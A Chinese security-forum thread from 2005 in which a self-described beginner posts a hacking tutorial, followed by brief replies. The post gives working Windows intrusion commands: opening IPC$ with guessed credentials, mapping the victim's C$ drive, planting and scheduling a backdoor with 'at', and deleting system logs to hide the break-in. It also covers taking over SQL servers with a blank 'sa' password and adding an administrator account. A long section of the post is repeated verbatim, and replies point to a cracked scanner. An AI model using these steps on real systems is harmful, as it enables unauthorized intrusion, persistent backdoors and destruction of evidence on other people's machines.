|
 | 作者: jianphu [jianphu]
 论坛用户 |
登录 |
| 本帖由 [NetDemon] 从 << 黑客进阶>> 转移而来其实对于很多菜鸟来说(包括我在内),都很想知道一个概念,那就是怎么样才算是一个真正的黑客。而成为一个黑客又到底需要哪些技能?其实这些问题在一些老鸟看来也是很难总结出来的。可是――我是菜鸟我怕谁,所以今天我就用一个菜鸟的眼光来制作这个专题。也许只有菜鸟才能了解菜鸟~ 一.必备工具 所谓兵马未动粮草先行,因为咱是菜鸟,所以有许多事情才不得不利用工具来完成,更何况那些老鸟也得借助某些工具的帮助。 1.windows2000 这里也许有的菜鸟会纳闷了,为什么工具要用windows2000?其实2000也不能算是工具,但是许多黑客软件都是基于2000平台或者在2000下可以发挥最大功效的。而且最近不久微软才发布了SP3的补丁,可以说2000是现在整个windows系列最安全的操作系统。而且现在游戏对2000来说也没有任何不兼容,所以我们为何不选择2000呢? 关于2000的下载网址我看写出来有点多余,外面一张D版4元一张,普通用户可以买PRO版。x想玩的更爽一点可以考虑弄个高级服务器版 2.天网防火墙&金山毒霸 要想进攻别人就得先做好良好的防御。据本人的观察,我平均每上1个小时就有至少4个IP来扫我,但是我有防火墙和杀毒软件,我看你们怎么黑我?我气得你心肝脾肺肾疼~其实防火墙和杀毒软件大家可以自己选择,但是有一点需要注意――杀毒软件一定要及时升级,你安10个不升级的杀毒软件不如安一个升级的好用~ 天网防火墙的下载地址是:http://www.ttian.net/download/show.php?id=404&down=1 金山毒霸2003的下载地址是:http://www.ttian.net/download/show.php?id=553&down=1 3.流光4(Fluxay 4.7 ) 想要看对方有什么漏洞可以被我们利用,总不能按照杂志上或者某些网站上告诉你的漏洞一个一个的试验吧。有一个好的扫描器可以让你在入侵的时候事半功倍(虽然大部分的漏洞我们不知道是干什么用的,不过有总比没有强吧?)。Fluxay 4.7的扫描速度本人认为是挺快的,而且功能也不少,可能要出5.0了。如果出了大家一定要去弄一个呀。 Fluxay 4.7 的下载地址是:http://www.netxeyes.org/fluxay47/fluxay47build3200setup.exe 二.基本素质 所谓的黑客基本素质并不是从业人员的那种服务素质,而是一种基本的文化素质,比如一些专业术语,或者一些常用端口之类的一定要知道一二。关于这些东西大家不用太心急,毕竟谁也不能一夜之间背住所有的术语和端口作用。这是一个积累的过程,俗话说的好,熟能生巧嘛。只要你一点一点的积累,一步一步的升华,就一定能够有很高的基本素质。(关于一些指令,漏洞的应用后文将作详细的解说) 这里有一个概念大家必须了解,黑客不等于骇客!!!!黑客只是做一些入侵或检测安全性之类的工作,而从不搞破坏工作!而骇客则不一样!所以切记宁黑勿骇呀!!!! 三.基本指令,漏洞详细解说 本人曾在网上看过无数的入侵实例和教程,但也许就是本人悟性不够吧,看了那么多就是看个一知半解,一下的文章就是给那些对入侵实例总是一知半解的人看的。 一般当我们用流光扫过一些主机以后经常会发现一些主机的ipc端口是开着的,并且已经破译出这台主机的用户名和密码。那IPC到底是干什么用的呢?通俗一点说,我们可以利用打开IPC通道来向对方机器传送后门程序,这样入侵不就轻而易举了吗? 比如我们扫到了一台用户名为12345 密码为12 IP为123.123.123.1的主机。 注意,用户名一点要有管理员权限。如果只是普通帐号怎么办?怎么提升管理权限? 嘿嘿,偶也正在研究,虽然方法已经知道了一些,但是具体原理正在研究,呵呵~菜鸟呀 开始要先打开cmd,什么?你不知道CMD是哪个程序?!@#$ 你可以在运行里直接输入“cmd” 也可以从“附件”里运行“命令提示符”这个程序。 打开以后输入“c:\>net use \\123.123.123.1\IPC$ "12" /user:"12345" ” 这是打开对方的IPC通道,这样就可以传送文件了。“/user”前面的是密码,后面的是用户名。 然后输入“net use z:\\123.123.123.1\c$ ” 这条命令是讲映射对方的C盘,当然其他盘也可以,只要存在就行了。我们这里把对方的C盘映射到本地的Z盘。之所以映射对方硬盘是因为这样可以图形化操作,否则指令化操作有的繁琐。 然后我们可以把后门程序现在这里设定直接拖入对方的硬盘中――也就是我们映射的Z盘。现在我们假设后门程序是“sss.exe” 文件成果拖入对方硬盘后,可以输入“c:\>net time \\123.123.123.1” 这是确认一下当前主机的时间,比如主机当前时间是 2002/2/27 上午 8:04 “c:\>at \\123.123.123.1 8:06 sss.exe” 这是加入一个任务,让对方的系统在8:06自动执行刚才拖入的后门程序。 后门程序执行以后,你愿意干什么就干什么吧。 当我们“玩”够了以后该推出了―别急,还有一项最重要的工作没有做!那就是删除日志,当然要删除日志啦!想被捉吗。呵呵。 NT的日志有这些 del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log 只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘。 好了,现在可以全身而退了,留着后门以后有空再来溜达。 本来是想把IPC提升用户权限的方法搞定后再写(3)的,但是有人突然让我写个关于SQL端口的入侵方法,那我也没办法了。只好硬着头皮写了,如果哪里写的不对请大家提出来。 在这里我仅以流光为例,SQL数据库的入侵方法本人暂时还不会………… 打开流光后,开始用高级扫描扫某一个网段,如果运气好的话,很快就能扫到几个用户名为“sa”,密码为空的,SQL端口主机。点击“连接”。 进入“SQLCMD”后,如果有看到英文提示"connet to ip mssql server success tupe command at prompt"那么说明SQL连接已经成功了。 然后我们就可以添加一个用户了,命令如下 “net user kkk 1234 /add” “kkk”是用户名,“1234”是密码。添加成功以后就可以试着提升该用户的权限了,命令如下 “net localgroup administrators kkk /add” 如果提升权限成功,那么kkk就是该主机的管理员了。 然后你就可以通过我在(2)里所讲的,开始留后门,入侵了。 今天先写这么多,本来想加点的,不过实在没有时间了,因为和克天讨论些东西所以没时间了,不好意思,明天如果有空就补上~ 这是菜鸟之间的讨论,如果您觉得有点太那个了,那也没办法,我是菜鸟我怕谁? 书接上回…… 上回说到关于黑客的基本工具,当你有了系统程序,防火墙,扫描器之后,不要以为这些工具就够用了,其实这是远远不够的,因为一些新出的工具说不定就有哪些功能是你急需要用的。所以你一定要找几个提供工具下载的安全网,时常的去看看,看看有没有新的软件提供下载,如果有你正需要的,那就赶快下载吧~ 二.基本素质 所谓的黑客基本素质并不是从业人员的那种服务素质,而是一种基本的文化素质,比如一些专业术语,或者一些常用端口之类的一定要知道一二。关于这些东西大家不用太心急,毕竟谁也不能一夜之间背住所有的术语和端口作用。这是一个积累的过程,俗话说的好,熟能生巧嘛。只要你一点一点的积累,一步一步的升华,就一定能够有很高的基本素质。(关于一些指令,漏洞的应用后文将作详细的解说) 这里有一个概念大家必须了解,黑客不等于骇客!!!!黑客只是做一些入侵或检测安全性之类的工作,而从不搞破坏工作!而骇客则不一样!所以切记宁黑勿骇呀!!!! 三.基本指令,漏洞详细解说 本人曾在网上看过无数的入侵实例和教程,但也许就是本人悟性不够吧,看了那么多就是看个一知半解,一下的文章就是给那些对入侵实例总是一知半解的人看的。 一般当我们用流光扫过一些主机以后经常会发现一些主机的ipc端口是开着的,并且已经破译出这台主机的用户名和密码。那IPC到底是干什么用的呢?通俗一点说,我们可以利用打开IPC通道来向对方机器传送后门程序,这样入侵不就轻而易举了吗? 比如我们扫到了一台用户名为12345 密码为12 IP为123.123.123.1的主机。 注意,用户名一点要有管理员权限。如果只是普通帐号怎么办?怎么提升管理权限? 嘿嘿,偶也正在研究,虽然方法已经知道了一些,但是具体原理正在研究,呵呵~菜鸟呀 开始要先打开cmd,什么?你不知道CMD是哪个程序?!@#$ 你可以在运行里直接输入“cmd” 也可以从“附件”里运行“命令提示符”这个程序。 打开以后输入“c:\>net use \\123.123.123.1\IPC$ "12" /user:"12345" ” 这是打开对方的IPC通道,这样就可以传送文件了。“/user”前面的是密码,后面的是用户名。 然后输入“net use z:\\123.123.123.1\c$ ” 这条命令是讲映射对方的C盘,当然其他盘也可以,只要存在就行了。我们这里把对方的C盘映射到本地的Z盘。之所以映射对方硬盘是因为这样可以图形化操作,否则指令化操作有的繁琐。 然后我们可以把后门程序现在这里设定直接拖入对方的硬盘中――也就是我们映射的Z盘。现在我们假设后门程序是“sss.exe” 文件成果拖入对方硬盘后,可以输入“c:\>net time \\123.123.123.1” 这是确认一下当前主机的时间,比如主机当前时间是 2002/2/27 上午 8:04 “c:\>at \\123.123.123.1 8:06 sss.exe” 这是加入一个任务,让对方的系统在8:06自动执行刚才拖入的后门程序。 后门程序执行以后,你愿意干什么就干什么吧。 当我们“玩”够了以后该推出了―别急,还有一项最重要的工作没有做!那就是删除日志,当然要删除日志啦!想被捉吗。呵呵。 NT的日志有这些 del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log 只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘。 好了,现在可以全身而退了,留着后门以后有空再来溜达。 |
| 地主 发表时间: 05-04-26 19:20 |
 | 回复: tk99 [tk99] 论坛用户 |
登录 |
|
怎么我看到的什么黑客入侵一类的,大都前提是扫到一个帐号,和密码啊? 难道没有别的方法吗?如扫到他开了端口然后用跟所端口进行入侵,或攻网站时利用漏洞一类的 |
| B1层 发表时间: 05-04-27 17:00 |
 | 回复: amao3273 [amao3273]  论坛用户 |
登录 |
|
支持,不过不知道怎么称呼!! 叫姐姐还是妹妹!!不过说到安全技术,实在是该称你为阿姨了(比我高一辈呀)!!! 我还是个菜菜!!!大白菜 |
| B2层 发表时间: 05-05-19 20:18 |
| 回复: on89757 [zhaowenli] 论坛用户 |
登录 |
|
晕了,,下载流光5都不让安装,网站上给的安装密码都错误的~ |
| B3层 发表时间: 05-05-20 10:04 |
 | 回复: Domain [aomin]  论坛用户 |
登录 |
|
回复楼上的 流光5.0有个 ┃ ┃ 欢迎您使用流光5.0 魔女の条件 ☆破解版☆ ┃ ┃ ┃ ┃ 由于Fluxay5Beta1是黑客基地VIP高级会员内部使用无限制 ┃ ┃版本,故没有本地时间校验和上网时间校验过期的提示信息,┃ ┃没有IP限制,请注意使用! ┃ ┃ ┃ ┃ 安装密码为www.hackbase.com ┃ ┃ ┃ ┃ 请不要在商业网络环境中运行此工具.否则可能会导致严厉 ┃ ┃的处罚。 ┃ 知道吗?安装密码上面写着呢? 不是错的,如果说错误而不能安装,那只能说明你有点小龊~ “知道为啥吗?” www.hackbase.com 这个密码要你用键盘输入,而不准许你COPY~。你要一个一个敲进去~不能复制 回复楼主! 引用--- “而且最近不久微软才发布了SP3的补丁, 可以说2000是现在整个windows系列最安全的操作系统。” 可以证明此帖是N年前的了~ M子从哪转的阿(里边的内容有点小乱哦你也仔细看看在整理整理,呵呵)!~ 怎么没有一点职业道德呀~也标个出处吗? |
| B4层 发表时间: 05-05-21 01:25 |
| 回复: on89757 [zhaowenli] 论坛用户 |
登录 |
|
嘿嘿 楼上的~ 我发现这个问题了~~ |
| B5层 发表时间: 05-05-22 12:02 |
 | 回复: virgoshaka [virgoshaka] 论坛用户 |
登录 |
|
tooooooooooold |
| B6层 发表时间: 05-05-22 14:30 |
 | 回复: wwgz [wwgz]  论坛用户 |
登录 |
|
不错,挺好的 |
| B7层 发表时间: 05-05-24 21:28 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 菜鸟黑客步步高